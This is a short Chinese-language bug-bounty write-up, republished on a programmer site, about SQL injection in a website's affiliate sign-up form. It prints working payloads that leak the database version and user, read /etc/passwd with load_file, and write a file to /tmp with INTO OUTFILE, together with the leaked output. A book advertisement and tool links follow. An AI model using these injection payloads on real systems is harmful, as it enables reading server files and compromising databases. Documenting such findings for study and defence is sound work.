第十五篇：SQL注入读取、写入文件

栏目: 数据库 · 发布时间: 5年前

我像往常一样注册网站会员

第十五篇：SQL注入读取、写入文件

然后通过POST方法将表单信息发送到 https://www.blablabla.com/svc/*****/form_affiliate。

这里的email参数存在 SQL 注入漏洞

第十五篇：SQL注入读取、写入文件

于是我在请求框 [email=””]参数中插入SQL语句

' and 1=2 union all select concat_ws(0x3a,version(),user(),database())--+

第十五篇：SQL注入读取、写入文件

结果在响应窗口显示 “5.5.41-log:root@10.130.0.1:tp_cart”。

现在我尝试使用SQL命令来读取文件

' and 1=2 union all select load_file('/etc/passwd')--+

第十五篇：SQL注入读取、写入文件

接着尝试在/tmp目录写入文件

' and 1=2 union all select 'blablalba_bug_bounty_program' into outfile '/tmp/blablabla'--+

第十五篇：SQL注入读取、写入文件

以上就是本文的全部内容，希望对大家的学习有所帮助，也希望大家多多支持码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络，本站转载出于传递更多信息之目的，版权归原作者或者来源机构所有，如转载稿涉及版权问题，请联系我们。

码农书籍

Haskell

Simon Thompson / Addison-Wesley / 1999-3-16 / GBP 40.99

The second edition of Haskell: The Craft of Functional Programming is essential reading for beginners to functional programming and newcomers to the Haskell programming language. The emphasis is on th......一起来看看《Haskell》这本书的介绍吧!

码农工具

MD5 加密

MD5 加密工具

HEX CMYK 转换工具

HEX CMYK 互转工具